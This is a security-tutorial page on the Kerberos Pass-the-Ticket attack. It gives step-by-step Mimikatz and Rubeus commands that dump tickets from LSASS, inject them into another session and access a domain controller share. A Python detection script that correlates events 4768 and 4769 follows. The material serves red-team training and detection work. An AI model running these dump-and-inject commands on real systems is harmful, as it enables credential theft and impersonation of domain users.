# Pass the Ticket Attack

### Overview

**Pass-the-Ticket (PtT)** is a Kerberos-based attack where an attacker steals a valid Kerberos ticket (TGT or TGS) from memory and injects it into another session to impersonate that user.

Unlike:

* **Pass-the-Hash** → abuses NTLM hashes
* **Overpass-the-Hash** → uses NTLM hash to request a TGT

**Pass-the-Ticket directly reuses a legitimate Kerberos ticket.**

No password/hash needed.

### What can be stolen

Two types of Kerberos tickets:

#### 1. TGT (Ticket Granting Ticket)

* Issued by Domain Controller (KDC)
* Used to request service tickets (TGS)
* Most powerful ticket to steal

#### 2. TGS (Service Ticket)

* Issued for specific services (e.g., CIFS/DC1)
* More limited scope

If you steal a TGT → You can request new TGS tickets.\
If you steal a TGS → You can access that specific service.

### Why this Works

On Windows:

* Tickets are stored in **LSASS memory**
* Associated with a logon session
* Managed by the Kerberos SSP (Security Support Provider)

When a user logs in:

1. The user authenticates and the KDC issues a TGT.
2. The TGT is stored in LSASS.
3. Service tickets (TGS) are requested as needed.

Kerberos assumes:

> If a process has a valid ticket in its logon session, it is that user.

There is **no re-validation of how the ticket got there.**

So if an attacker:

* Extracts the ticket
* Injects it into another session

**Windows trusts it.**

### Prerequisites

1. Local admin on victim machine (to dump LSASS)
2. A user currently logged in (preferably privileged)
3. Mimikatz or Rubeus

### Steps

1. Dump Kerberos Tickets:

   ```bash
   # Mimikatz
   mimikatz.exe
   privilege::debug
   # Exports every ticket in LSASS as a .kirbi file in the current dir.
   # Eg: krbtgt_corp.com.kirbi (TGT)
   # Eg: dave@cifs-web04.kirbi (TGS)
   sekurlsa::tickets /export

   # Rubeus alternative: prints each ticket as a base64 blob instead of writing files
   Rubeus.exe dump
   ```
2. Inject the ticket into the current session (which may belong to a different user):

   ```bash
   # Mimikatz
   kerberos::ptt krbtgt_corp.com.kirbi

   # Use rubeus to inject via Base64 Ticket or from file
   Rubeus.exe ptt /ticket:<base64_ticket>
   Rubeus.exe ptt /ticket:admin.kirbi
   ```
3. Verify that the TGT/TGS is now present in the session with `klist`. \
   On a Linux host, Kerberos-aware tools locate the credential cache through the `KRB5CCNAME` environment variable, so once a ticket is obtained or converted to `.ccache` format it must be referenced there before other tools can use it.

   ```bash
   # Point Kerberos-aware tools at the credential cache holding the ticket
   export KRB5CCNAME=/path/to/ticket.ccache
   ```
4. Access resources with the injected ticket (with a TGT, Windows requests the required service ticket transparently):

   ```bash
   dir \\DC1\C$
   ```
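The mechanism above leaves a trace on the domain controller: the TGT is issued (event 4768) to the host where the user logged on, but the service-ticket requests (event 4769) made with the injected copy arrive from a different client address. The following detection sketch is an added example, not part of the original page; it assumes a simplified, constructed key=value rendering of the DC's audit events rather than the real Windows event XML.

```python
"""Flag Kerberos service-ticket requests (4769) whose client address never
received a TGT (4768) for that account: a TGT obtained on one host and used
from another. The log format below is constructed for this example."""
from collections import defaultdict

# Constructed sample: alice is normal, dave's TGT is used from a host that
# never logged on, and bob requests service tickets with no TGT issued at all.
SAMPLE_LOG = """\
4768 Account=alice ClientAddress=::ffff:10.0.0.30 Service=krbtgt
4769 Account=alice ClientAddress=::ffff:10.0.0.30 Service=ldap/dc1
4768 Account=dave ClientAddress=::ffff:10.0.0.21 Service=krbtgt
4769 Account=dave ClientAddress=::ffff:10.0.0.21 Service=cifs/web04
4769 Account=dave ClientAddress=::ffff:10.0.0.77 Service=cifs/dc1
4769 Account=bob ClientAddress=::ffff:10.0.0.99 Service=cifs/dc1
"""

def parse_events(text):
    """Turn the key=value lines into (event_id, account, client_ip, service)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event_id, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        # DCs log IPv4 clients as IPv4-mapped IPv6 (::ffff:a.b.c.d); normalise.
        ip = kv["ClientAddress"]
        ip = ip[7:] if ip.startswith("::ffff:") else ip
        events.append((int(event_id), kv["Account"].lower(), ip, kv["Service"]))
    return events

def find_ticket_reuse(events):
    """Return (account, client_ip, service) for every 4769 whose client
    address has no earlier 4768 for the same account in this log."""
    tgt_hosts = defaultdict(set)  # account -> addresses that were issued a TGT
    hits = []
    for event_id, account, ip, service in events:
        if event_id == 4768:
            tgt_hosts[account].add(ip)
        elif event_id == 4769 and ip not in tgt_hosts[account]:
            hits.append((account, ip, service))
    return hits

if __name__ == "__main__":
    for account, ip, service in find_ticket_reuse(parse_events(SAMPLE_LOG)):
        print(f"possible ticket reuse: {account} from {ip} -> {service}")
```

The heuristic only works when the 4768 that issued the TGT is still within the log window, so the correlation period must cover the ticket lifetime (10 hours by default), and environments with NAT or VPN address changes need the client-address comparison relaxed accordingly.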

